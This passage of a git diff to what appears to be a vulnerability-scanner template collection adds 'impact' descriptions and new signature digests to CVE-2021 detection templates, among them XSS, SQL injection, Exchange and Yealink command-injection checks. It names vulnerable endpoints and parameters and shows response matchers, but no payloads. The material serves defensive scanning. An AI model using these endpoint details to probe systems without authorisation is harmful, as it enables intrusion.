+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Upgrade Apache OFBiz to version 17.12.06 or later to mitigate this vulnerability.
   reference:
@@ -67,4 +69,4 @@ http:
         part: header
         words:
           - "OFBiz.Visitor="
-# digest: 4b0a00483046022100889bfeb8f974e405f269334b90bf0d9285903bc45e0d0d2b8ea5e2a332b29cd8022100b1484ed0816520b683e7b82207fa2522e0425fe7c5faf95b6e821fe64df721cc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207fceb6c1afd6b61eea8fc64a6f46f583277f2c792ca6c37d0a2a03a34909d67c0221008d49815caf6057b3e04cf2a4e817adb8bcef6f220427227c65c73e825dc390bc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-26475.yaml b/http/cves/2021/CVE-2021-26475.yaml
index 6a337f2cb3..d7e81303b4 100644
--- a/http/cves/2021/CVE-2021-26475.yaml
+++ b/http/cves/2021/CVE-2021-26475.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: EPrints 3.4.2 contains a reflected cross-site scripting vulnerability via the cgi/cal URI.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or upgrade to a newer version of EPrints that addresses this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100fad368238b5f9a7d1234267a9cbfab389e6a60e70dfba668b4f1e8bc17265d22022058326f62453e7ad460794b479ba9cb2c03ff64eed4f280199fbc8abbfa42708d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220392897dad18f8662cd1a562fa864134e812c62327a4c58dc8c13f340f449c111022018edebc6943168dc7077b839900ddaf8ef3c47efb3f2c159ebd0964187db8564:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-26598.yaml b/http/cves/2021/CVE-2021-26598.yaml
index 3c3ad868a3..5840f63c30 100644
--- a/http/cves/2021/CVE-2021-26598.yaml
+++ b/http/cves/2021/CVE-2021-26598.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741,pdteam
   severity: medium
   description: ImpressCMS before 1.4.3 is susceptible to incorrect authorization via include/findusers.php. An attacker can provide a security token and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can bypass authorization and gain unauthorized access to sensitive information or perform unauthorized actions.
   remediation: |
     Upgrade to ImpressCMS version 1.4.3 or later to fix the vulnerability.
   reference:
@@ -60,4 +62,4 @@ http:
           - "REQUEST' value='(.*?)'"
           - 'REQUEST" value="(.*?)"'
         internal: true
-# digest: 4b0a00483046022100d48de2dfaa91ac7078453f7d007b6d238800f3f85b62d6272662b69338d51923022100bbed2126302b02d3d703f8faa0dbc479fdc29a8b3bf4a65462842c72c914a267:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206148a41cd16c55aa52cf630cca91fe8b8948d00dafbe8ecde43d6e904b66b0ee022100b58c82d399a1f90b3ed80f79f82d03828a8b9424a176e71ad02ae527d8baeee4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-26702.yaml b/http/cves/2021/CVE-2021-26702.yaml
index 66359a636c..6180173599 100644
--- a/http/cves/2021/CVE-2021-26702.yaml
+++ b/http/cves/2021/CVE-2021-26702.yaml
@@ -5,6 +5,8 @@ info:
   author: ritikchaddha
   severity: medium
   description: EPrints 3.4.2 contains a reflected cross-site scripting vulnerability in the dataset parameter to the cgi/dataset_ dictionary URI.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or upgrade to a newer version of EPrints that addresses this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d26714293888259b58b43b3558c3dc070b93041541d9de0794b117683e265b720220360ae88c0c356f315cbd80ace3dc04d3ce03b6d95a46fbd8abb96849bbf9d3e3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e9d041e79a0ee6406facb317e2dd062e0c2444b156424210b9ff5688735dc6d8022100f0f2d99af0348ffc8a6cb085c91d1cb8ac5436d6d67c1d7b1657043ee62dfda4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-26710.yaml b/http/cves/2021/CVE-2021-26710.yaml
index 6cb3e6cc03..ae9983170b 100644
--- a/http/cves/2021/CVE-2021-26710.yaml
+++ b/http/cves/2021/CVE-2021-26710.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Redwood Report2Web 4.3.4.5 and 4.5.3 contains a cross-site scripting vulnerability in the login panel which allows remote attackers to inject JavaScript via the signIn.do urll parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to the latest version of Redwood Report2Web or apply the vendor-provided patch to fix the XSS vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402200c7459505f8be34816396ce48e7f4c6b81158f2cef959b9e58275380e45d06da022069caed6e511fccbdb6a25c52a4a674d6e193931debc8eccdcc3caf21bbf6d04b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009e5d40f1dce3fa6888ed3ba0a117d797a1fbc0686ff8681b2973e91abe36eb80022058b4745750cf6d64a25ad2e14163c31fd6de1381dbee5e67eeba92f84a869d37:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-26723.yaml b/http/cves/2021/CVE-2021-26723.yaml
index a1b98cdaa1..725f1c53d8 100644
--- a/http/cves/2021/CVE-2021-26723.yaml
+++ b/http/cves/2021/CVE-2021-26723.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Jenzabar 9.2.x through 9.2.2 contains a cross-site scripting vulnerability. It allows /ics?tool=search&query.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patch or upgrade to a non-vulnerable version of Jenzabar 9.2x-9.2.2.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022031b17b158bca97d9882dda246863572b94f820229f4f74de9d2505504076db6e0220645e20d07352837f7c919bb40da85cc975e745750d8a03002f30b45196cbf0eb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100bf8d10e32ca78e4dd0d71df97198ba959d80fe71f9cfc0a79dcc364ff27f9ffd022100bd5280032731302969d9d2559ff63cb5595710ee92c3f431b1d9728117b2a757:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-26812.yaml b/http/cves/2021/CVE-2021-26812.yaml
index 5e84058567..03387353fa 100644
--- a/http/cves/2021/CVE-2021-26812.yaml
+++ b/http/cves/2021/CVE-2021-26812.yaml
@@ -5,6 +5,8 @@ info:
   author: aceseven (digisec360)
   severity: medium
   description: Moodle Jitsi Meet 2.7 through 2.8.3 plugin contains a cross-site scripting vulnerability via the "sessionpriv.php" module. This allows attackers to craft a malicious URL, which when clicked on by users, can inject JavaScript code to be run by the application.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the Moodle Jitsi Meet plugin to mitigate the XSS vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502205722d71f1cfe40f7808f50ce1f96e19b71889280efb8075c11d5c8c42b88926b022100a616ccc05e7bfaef1a92494f690d44b98f23d7e90bd562f1675e930266736860:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203435832446048eda3a121b16fbeed9de6ea9536b76fad4741f6e3c03060fc5c2022100d341e62d5f0646e819472abdc42292a06176c85a5ba863527ededcf9260acdef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-26855.yaml b/http/cves/2021/CVE-2021-26855.yaml
index 85c6652d3a..0cdbd6698e 100644
--- a/http/cves/2021/CVE-2021-26855.yaml
+++ b/http/cves/2021/CVE-2021-26855.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: critical
   description: This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or further compromise of the affected system.
   remediation: Apply the appropriate security update.
   reference:
     - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855
@@ -39,5 +41,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-
-# digest: 4b0a00483046022100ee7be9a2e1359eac9ca103f0edbd0bbd4241bf035ce0fbd9b99ea4bc9798777a0221009f65ff0d6ca86b89e858e6f8a7b1623d29e769049b8bdde99f68f617ddb93c2d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207dcadc539290acf7c0743864c4634692714764edcde42c8a50282a35ebec40f0022100b783d87588eea6ea134ec5470a45d25dbfcdebcb458a5d323f2e2b9e3ae43498:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-27124.yaml b/http/cves/2021/CVE-2021-27124.yaml
index d856f7695d..98eeddd419 100644
--- a/http/cves/2021/CVE-2021-27124.yaml
+++ b/http/cves/2021/CVE-2021-27124.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     SQL injection in the expertise parameter in search_result.php in Doctor Appointment System v1.0.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d76f740afa7730d6ebab6834dfcab496e3bbce5afbb934254757360d6d202a850220314d8156534092620bc36d4a0741a15964fe32933d74bec3c555e5f0ac7157c8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203bed756c6f4e399499479e9413596c917ef8f548853f048433b1b04559920e7302207fe08bfa3f4195ed77b5ce537271becd28bcf6409fce140e4206a821c56fa087:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-27132.yaml b/http/cves/2021/CVE-2021-27132.yaml
index f2e755f19a..3852e6ca8b 100644
--- a/http/cves/2021/CVE-2021-27132.yaml
+++ b/http/cves/2021/CVE-2021-27132.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: critical
   description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to Carriage Return Line Feed (CRLF) injection via the Content-Disposition header.
+  impact: |
+    Successful exploitation of this vulnerability could lead to various attacks, including session hijacking, cross-site scripting (XSS), and cache poisoning.
   remediation: |
     Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
         part: header
         status:
           - 404
-# digest: 490a00463044022073edf0c4b4bd199264cd7e2a8790ee6a4139287662bdf3c7c8e79f3a7e614a000220122aff33d4349a7dc6284ba03d9fbc406219bf0fb75bd26cfcdc298afb8c90a8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022054cecaf8e3508659957867b295423491e49c068630732dc97408a596c1ebf950022100f5a1da05b4291ef272045bd346389536179732c98c5838a77f20fc12628a5743:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-27309.yaml b/http/cves/2021/CVE-2021-27309.yaml
index eec2fff140..6c4ecc0816 100644
--- a/http/cves/2021/CVE-2021-27309.yaml
+++ b/http/cves/2021/CVE-2021-27309.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the  "module" parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of Clansphere CMS or apply the vendor-supplied patch to fix the XSS vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100d233826e4b16303b2d6aae1b2806a4e4e15d2eb38c93177c9e9b5684acc53c96022100b7b9965ce7f0c9129006baf2992558dd2365cccbfc31bbfd35b196ca44743c45:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b5ba0b208e2f037355d1c17a88b2de1f33f65abd38a562caec18c757164ccb9c022100d7caae36893eee674536ab0ce35046f09d156b154c862507d5de434564006d90:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-27310.yaml b/http/cves/2021/CVE-2021-27310.yaml
index 825b02254c..20725cc620 100644
--- a/http/cves/2021/CVE-2021-27310.yaml
+++ b/http/cves/2021/CVE-2021-27310.yaml
@@ -5,6 +5,8 @@ info:
   author: alph4byt3
   severity: medium
   description: Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the "language" parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d7db877f2629ec144959984b51fa80dd62733eb44aa992c1f7c89d40845a0a2802203d7547604c29e0bf02d1458cf7581da50ef69b0d32f867835e0a1f5e232ed710:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022059c3cf134e15ad7206d9dfc13d46bf4bd6e2bebd191d7369fe00615e2c9360c502206533ca8471eac13731e7dfe82c56f24b43399d70d542e6a10d2e2c3a18bce555:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-27314.yaml b/http/cves/2021/CVE-2021-27314.yaml
index 4cfe1d8edf..0b220fd078 100644
--- a/http/cves/2021/CVE-2021-27314.yaml
+++ b/http/cves/2021/CVE-2021-27314.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     SQL injection in admin.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via username parameter at login page.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
           - 'status_code == 200'
           - 'contains(body, "Doctor Appoinment System")'
         condition: and
-# digest: 4a0a00473045022100e157feb374cf98fb31995eec64b69889e8f1626b0c9522e0a96ef3674f07cde902204a216771a62a97853a9a35c77e2ef5b24d2dc7cdbb8be2cc65c478bbe4e8b7ec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c46e96be6d1578a38f5a54bbc8ac244485d95fb423184cb0db6700663e9d907a02203ab14abef177ae42405f792eab86c512391145b7298edcb25d7d20f7c48304df:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-27315.yaml b/http/cves/2021/CVE-2021-27315.yaml
index 0cb11e38b8..2d6e57ea30 100644
--- a/http/cves/2021/CVE-2021-27315.yaml
+++ b/http/cves/2021/CVE-2021-27315.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via the comment parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
           - 'status_code == 500'
           - 'contains(body, "Medical Management System")'
         condition: and
-# digest: 4a0a00473045022100e0bc809467727821ea14fb863a12d1665d8d27fb203801e04c00aac3678d037802204114a669794bb7c51aa927edaa9bcc633c4527c04a060452a6a1a38d3dd8942f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ef2053f10fccd80c87a544f5b194c0f9096ebbc7ec30b7030e3db5a5e173fca402200f88ac909276decdb2fb140d64b9ca4dcd4adf51d5f69c62438cf8d6c3161420:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-27316.yaml b/http/cves/2021/CVE-2021-27316.yaml
index f98e085441..3508a942a3 100644
--- a/http/cves/2021/CVE-2021-27316.yaml
+++ b/http/cves/2021/CVE-2021-27316.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Blind SQL injection in contactus.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via lastname parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
           - 'status_code == 500'
           - 'contains(body, "Medical Management System")'
         condition: and
-# digest: 4a0a00473045022100d1f38774451fb859004255a3ebed0b7829f9757afb1a10e163ac310f47f1e91602204cb1e45e01dec1ddd671ed1aff55ed467b8fee6a3735c7e950f830c6bc7fa5f1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022072fdf53959c55b2cbf504c14e7f00554fd5cbdb01fcaba1891763f5fbd434892022100c609a969d90f82fcea64b48c0b6054756c15aa9a4148c14137467abdeddbf438:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-27319.yaml b/http/cves/2021/CVE-2021-27319.yaml
index 4352c65fa3..1212f12465 100644
--- a/http/cves/2021/CVE-2021-27319.yaml
+++ b/http/cves/2021/CVE-2021-27319.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via email parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
           - 'status_code == 500'
           - 'contains(body, "Medical Management System")'
         condition: and
-# digest: 4b0a00483046022100a3c706320642316690211621fe63d130d07569be91fc8d200518f44fac94656d022100a75df9cab2bdc85c387377f8305386aa92298922bbb627c51b06ce2f17becbb5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100af99365059b738f62178b184f385b528cabdce26aee048310d8a2ee908cd86cc02206871847573d96637318405cdbe1f963804d7d9fcd294344faceff8a91f9db619:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-27320.yaml b/http/cves/2021/CVE-2021-27320.yaml
index d6ae245609..92be1a6282 100644
--- a/http/cves/2021/CVE-2021-27320.yaml
+++ b/http/cves/2021/CVE-2021-27320.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via firstname parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
           - 'status_code == 500'
           - 'contains(body, "Medical Management System")'
         condition: and
-# digest: 4a0a0047304502204554054c1259159530fe1f02d6c2ec5278e21dc074cac9c5591da177b95b437a022100af416756d4e1c14bbaaad29eb3bb4f69c0093ae9ad725a6f2f232e00b5f4652e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220158593bd7e7208566dbd089d09b1de4c044296cc2b067460906f9a8241f7c21a02202d5efa1a236074dc4d8e2a0fc190bd4c1588277338cf27afb3238a067b341e5c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-27330.yaml b/http/cves/2021/CVE-2021-27330.yaml
index 267382a2e5..b6e9883025 100644
--- a/http/cves/2021/CVE-2021-27330.yaml
+++ b/http/cves/2021/CVE-2021-27330.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Triconsole Datepicker Calendar before 3.77 contains a cross-site scripting vulnerability in calendar_form.php. Attackers can read authentication cookies that are still active, which can be used to perform further attacks such as reading browser history, directory listings, and file contents.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of Triconsole Datepicker Calendar that properly validates user input to prevent XSS attacks.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100e4167461c4213c9ad68d3f34d8b90dec7421bed5c90cdcc5560b60d96fe87e4b022100ecd481e625cde651dc5e70b1df3ebbd48359e767a55a6077c73178b27231ad4e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100938e5bb7952609f09a06fe47a83a5c49aea170bfd490bc9f87bfd060a19e95f7022100bab7e980baa9bff9468eeb2d98762fb84613ff5b37ed3a00bdbc034c8f2143ec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-27358.yaml b/http/cves/2021/CVE-2021-27358.yaml
index a4b1cfe214..2ee9310909 100644
--- a/http/cves/2021/CVE-2021-27358.yaml
+++ b/http/cves/2021/CVE-2021-27358.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam,bing0o
   severity: high
   description: Grafana 6.7.3 through 7.4.1 snapshot functionality can allow an unauthenticated remote attacker to trigger a Denial of Service via a remote API call if a commonly used configuration is set.
+  impact: |
+    An attacker can create snapshots of sensitive data without authentication, potentially leading to unauthorized access and data exposure.
   remediation: |
     Upgrade to the latest version of Grafana that includes a fix for CVE-2021-27358 or apply the provided patch to mitigate the vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
         part: header
         words:
           - "application/json"
-# digest: 490a0046304402201009c4ffa0fd03dd4af54c1bac901e613162d16b425f15a3d1d8d3d8f23b836702204ab75c1d0a7a1c544f4a15018fd2a6557736a74f05c29473e94ec5649b2e92d9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022015a0ca7e5bb4d928f45991217af7e2d12c89193076c02eb5dc98be45cb18089d022061c20d223db67420c53eb3122d73139a1d3997ec5bc09c09f5fe492268690fa4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-27519.yaml b/http/cves/2021/CVE-2021-27519.yaml
index 4a095dd4e3..c1cd578062 100644
--- a/http/cves/2021/CVE-2021-27519.yaml
+++ b/http/cves/2021/CVE-2021-27519.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the "srch" parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Upgrade to the latest version of FUDForum or apply the provided patch to fix the XSS vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402205a9939b8b37d0bdb5b5b33971774da5af4afca212761c25f215c2130780eb3d3022031dc4939a7db8a903fc758f6960244ce538b54358ecee811b451bb3abb24f676:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100db444ff93200c2db65951e611fc0c38b462f427de63e56459a24ffc55103de4f02203381c1e55fc64d650ce777db11901cd93d126c80e2d3ab81112f3a53eaa8d933:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-27520.yaml b/http/cves/2021/CVE-2021-27520.yaml
index c276c90f8b..061740b7e1 100644
--- a/http/cves/2021/CVE-2021-27520.yaml
+++ b/http/cves/2021/CVE-2021-27520.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     FUDForum 3.1.0 contains a cross-site scripting vulnerability. An attacker can inject JavaScript via index.php in the author parameter, thereby possibly stealing cookie-based authentication credentials and launching other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Upgrade to the latest version of FUDForum or apply the provided patch to fix the XSS vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100e83a062936c4dfcb98734b884c0dbda66d27d238a5d500720bf93e7fa2652d3c0220245e477693cf86aee69200d045ffe2b6c2d877d705e5787853f114cae1cf7b95:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220711bb05e6e22f2a47cefe31239e627c17cf0b0fb8921d7748500f52c22389830022100e3bbb135d2d2e7bbb25d30dbfca90fba11f74d00a5e1e29809defbedcf0e8831:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-27561.yaml b/http/cves/2021/CVE-2021-27561.yaml
index 1eac0b50ac..4fc550b1df 100644
--- a/http/cves/2021/CVE-2021-27561.yaml
+++ b/http/cves/2021/CVE-2021-27561.yaml
@@ -5,6 +5,8 @@ info:
   author: shifacyclewala,hackergautam
   severity: critical
   description: Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device.
   remediation: |
     Update to the latest firmware version provided by the vendor to mitigate this vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: regex
         regex:
           - "(u|g)id=.*"
-# digest: 490a0046304402200d2fb6082c1c608261bf1e749c20fb4a7c8351ce2d3472dca5f4cdcdd5cfc98c02207af66f7179476d0158c223d680fac893d8d9a3f6ad0c00b397f30d32f0f63776:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ebfa323425ca66f8c1226ee0bd912bc712f339dbba86b9acb3139cee883882a5022100ac38a5e7b284c9c979eb551065531979c1b31a2d8e30a76da654a237ea2d8346:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-27651.yaml b/http/cves/2021/CVE-2021-27651.yaml
index b2a3341baa..6513fb4331 100644
--- a/http/cves/2021/CVE-2021-27651.yaml
+++ b/http/cves/2021/CVE-2021-27651.yaml
@@ -5,6 +5,8 @@ info:
   author: idealphase,daffainfo
   severity: critical
   description: Pega Infinity versions 8.2.1 through 8.5.2 contain an authentication bypass vulnerability because the password reset functionality for local accounts can be used to bypass local authentication checks.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Pega Infinity application.
   remediation: |
     Apply the necessary security patches or updates provided by Pega Infinity to mitigate the authentication bypass vulnerability (CVE-2021-27651).
   reference:
@@ -60,4 +62,4 @@ http:
         group: 1
         regex:
           - '(?m)<span>Pega ([0-9.]+)</span>'
-# digest: 4a0a004730450221008c01b91c0c56b368c145ab7c61fae6ca8d41b6e747a27404fca826350a1b1f0902204f7a0fdce927535df594ac112dd2fd478f021d1148dff8d6ca2aee02dc6f622a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210092643c502653eeba1f6ff565e96779a4b833ade37a04b1d659400517c78a2a510220458c23e48df7c66728f5e3d7521082d06ae7507c230e70754cfb8f50673960ba:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-27670.yaml b/http/cves/2021/CVE-2021-27670.yaml
index 21b911b8c5..f1b2b50e8c 100644
--- a/http/cves/2021/CVE-2021-27670.yaml
+++ b/http/cves/2021/CVE-2021-27670.yaml
@@ -5,6 +5,8 @@ info:
   author: ritikchaddha
   severity: critical
   description: Appspace 6.2.4 allows SSRF via the api/v1/core/proxy/jsonprequest url parameter.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.
   remediation: |
     Upgrade to a patched version of Appspace 6.2.4 or apply the necessary security patches provided by the vendor.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
